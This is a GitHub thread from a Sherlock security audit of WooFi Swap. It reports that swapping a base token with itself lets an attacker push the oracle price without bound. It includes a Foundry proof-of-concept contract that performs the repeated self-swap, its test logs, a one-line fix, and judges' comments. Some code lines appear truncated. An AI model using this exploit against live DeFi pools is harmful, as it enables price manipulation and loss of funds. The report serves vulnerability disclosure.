sherlock-audit / 2024-03-woofi-swap-judging

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KingNFT - Price manipulation by swapping any ````baseToken```` with itself #32

Open sherlock-admin3 opened 6 months ago

sherlock-admin3 commented 6 months ago



Price manipulation by swapping any baseToken with itself


WooPPV2.swap() doesn't forbid the case that fromToken == toToken == baseToken, attackers can make any baseToken's price unboundedly drifting away by swapping with self.

Vulnerability Detail

The issue arises due to incorrect logic in WooPPV2._swapBaseToBase():

  1. Firstly, we can see the situation that fromToken == toToken == baseToken can pass the checks on L521\~L522.
  2. baseToken's state & price is cached in memory on L527\~L528, and updated first time on L541, but the price calculation on L555 still uses the cached state, and the newBase2Price is set to wooracle on L556 as the final price after the swap.

As a result, swapping baseToken with itself will cause a net price drift rather than keeping price unchanged.

File: contracts\WooPPV2.sol
513:     function _swapBaseToBase(
520:     ) private nonReentrant whenNotPaused returns (uint256 base2Amount) {
521:         require(baseToken1 != address(0) && baseToken1 != quoteToken, "WooPPV2: !baseToken1");
522:         require(baseToken2 != address(0) && baseToken2 != quoteToken, "WooPPV2: !baseToken2");
527:         IWooracleV2.State memory state1 = IWooracleV2(wooracle).state(baseToken1);
528:         IWooracleV2.State memory state2 = IWooracleV2(wooracle).state(baseToken2);
539:             uint256 newBase1Price;
540:             (quoteAmount, newBase1Price) = _calcQuoteAmountSellBase(baseToken1, base1Amount, state1);
541:             IWooracleV2(wooracle).postPrice(baseToken1, uint128(newBase1Price));
554:             uint256 newBase2Price;
555:             (base2Amount, newBase2Price) = _calcBaseAmountSellQuote(baseToken2, quoteAmount, state2);
556:             IWooracleV2(wooracle).postPrice(baseToken2, uint128(newBase2Price));
578:     }

The following coded PoC intuitively shows the problem with a specific case:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import {Test} from "../../lib/forge-std/src/Test.sol";
import {console2} from "../../lib/forge-std/src/console2.sol";
import {WooracleV2_2} from "../../contracts/wooracle/WooracleV2_2.sol";
import {WooPPV2} from "../../contracts/WooPPV2.sol";
import {TestERC20Token} from "../../contracts/test/TestERC20Token.sol";
import {TestUsdtToken} from "../../contracts/test/TestUsdtToken.sol";

contract TestWbctToken is TestERC20Token {
    function decimals() public view virtual override returns (uint8) {
        return 8;

contract PriceManipulationAttackTest is Test {
    WooracleV2_2 oracle;
    WooPPV2 pool;
    TestUsdtToken usdt;
    TestWbctToken wbtc;
    address evil = address(0xbad);

    function setUp() public {
        usdt = new TestUsdtToken();
        wbtc = new TestWbctToken();
        oracle = new WooracleV2_2();
        pool = new WooPPV2(address(usdt));

        // parameters reference: Integration_WooPP_Fee_Rebate_Vault.test.ts
        pool.setMaxGamma(address(wbtc), 0.1e18);
        pool.setMaxNotionalSwap(address(wbtc), 5_000_000e6);
        pool.setFeeRate(address(wbtc), 25);
        oracle.postState({_base: address(wbtc), _price: 50_000e8, _spread: 0.001e18, _coeff: 0.000000001e18});
        oracle.setAdmin(address(pool), true);

        // add some initial liquidity, 10_000_000e6);
        usdt.approve(address(pool), type(uint256).max);
        pool.depositAll(address(usdt));, 100e8);
        wbtc.approve(address(pool), type(uint256).max);

    function testMaxPriceDriftInNormalCase() public {
        (uint256 initPrice, bool feasible) = oracle.price(address(wbtc));
        assertEq(initPrice, 50_000e8);

        // buy almost all wbtc in pool, 5_000_000e6);
        usdt.transfer(address(pool), 5_000_000e6);
            fromToken: address(usdt),
            toToken: address(wbtc),
            fromAmount: 5_000_000e6,
            minToAmount: 0,
            to: address(this),
            rebateTo: address(this)

        (uint256 pastPrice, bool feasible2) = oracle.price(address(wbtc));
        uint256 drift = ((pastPrice - initPrice) * 1e5) / initPrice;
        assertEq(drift, 502); // 0.502%
        console2.log("Max price drift in normal case: ", _toPercentString(drift));

    function testUnboundPriceDriftInAttackCase() public {
        (uint256 initPrice, bool feasible) = oracle.price(address(wbtc));
        assertEq(initPrice, 50_000e8);

        // top up the evil, in real case, the fund could be from a flashloan, 100e8);

        for (uint256 i; i < 10; ++i) {
            uint256 balance = wbtc.balanceOf(evil);
            wbtc.transfer(address(pool), balance);
                fromToken: address(wbtc),
                toToken: address(wbtc),
                fromAmount: balance,
                minToAmount: 0,
                to: evil,
                rebateTo: evil
            (uint256 pastPrice, bool feasible2) = oracle.price(address(wbtc));
            uint256 drift = ((pastPrice - initPrice) * 1e5) / initPrice;
            console2.log("Unbound price drift in attack case: ", _toPercentString(drift));    

    function _toPercentString(uint256 drift) internal pure returns (string memory result) {
        uint256 d_3 = drift % 10;
        uint256 d_2 = (drift / 10) % 10;
        uint256 d_1 = (drift / 100) % 10;
        uint256 d0 = (drift / 1000) % 10;
        result = string.concat(_toString(d0), ".", _toString(d_1), _toString(d_2), _toString(d_3), "%");
        uint256 d = drift / 10000;
        while (d > 0) {
            result = string.concat(_toString(d % 10), result);
            d = d / 10;

    function _toString(uint256 digital) internal pure returns (string memory str) {
        str = new string(1);
        bytes16 symbols = "0123456789abcdef";
        assembly {
            mstore8(add(str, 32), byte(digital, symbols))

And the logs:

2024-03-woofi-swap\WooPoolV2> forge test --match-contract PriceManipulationAttackTest -vv
[⠆] Compiling...No files changed, compilation skipped
[⠰] Compiling...

Running 2 tests for test/foundry/PriceManipulationAttack.t.sol:PriceManipulationAttackTest
[PASS] testMaxPriceDriftInNormalCase() (gas: 158149)
  Max price drift in normal case:  0.502%

[PASS] testUnboundPriceDriftInAttackCase() (gas: 648243)
  Unbound price drift in attack case:  0.499%
  Unbound price drift in attack case:  0.998%
  Unbound price drift in attack case:  1.496%
  Unbound price drift in attack case:  1.994%
  Unbound price drift in attack case:  2.491%
  Unbound price drift in attack case:  2.988%
  Unbound price drift in attack case:  3.483%
  Unbound price drift in attack case:  3.978%
  Unbound price drift in attack case:  4.473%
  Unbound price drift in attack case:  4.967%

Test result: ok. 2 passed; 0 failed; 0 skipped; finished in 6.59ms

Ran 1 test suites: 2 tests passed, 0 failed, 0 skipped (2 total tests)


Acccording WooFI doc (, the Wooracle is intended to work as a price feed infrastructure for both WooFI's other components and third parties. This bug would cause all related consumer APPs suffering potential price manipulation attack.

Code Snippet

Tool used

Manual Review


2024-03-woofi-swap\WooPoolV2> git diff
diff --git a/WooPoolV2/contracts/WooPPV2.sol b/WooPoolV2/contracts/WooPPV2.sol
index e7a6ae8..9440089 100644
--- a/WooPoolV2/contracts/WooPPV2.sol
+++ b/WooPoolV2/contracts/WooPPV2.sol
@@ -520,6 +520,7 @@ contract WooPPV2 is Ownable, ReentrancyGuard, Pausable, IWooPPV2 {
     ) private nonReentrant whenNotPaused returns (uint256 base2Amount) {
         require(baseToken1 != address(0) && baseToken1 != quoteToken, "WooPPV2: !baseToken1");
         require(baseToken2 != address(0) && baseToken2 != quoteToken, "WooPPV2: !baseToken2");
+        require(baseToken1 != baseToken2, "WooPPV2: baseToken1 == baseToken2");
         require(to != address(0), "WooPPV2: !to");

         require(balance(baseToken1) - tokenInfos[baseToken1].reserve >= base1Amount, "WooPPV2: !BASE1_BALANCE");
sherlock-admin4 commented 6 months ago

The protocol team fixed this issue in the following PRs/commits:

WangSecurity commented 6 months ago

request poc

sherlock-admin2 commented 6 months ago

PoC request not allowed.

WangSecurity commented 6 months ago

We decided to downgrade it to med cause the cost of such attack is extremely high.

sherlock-admin2 commented 5 months ago

The Lead Senior Watson signed off on the fix.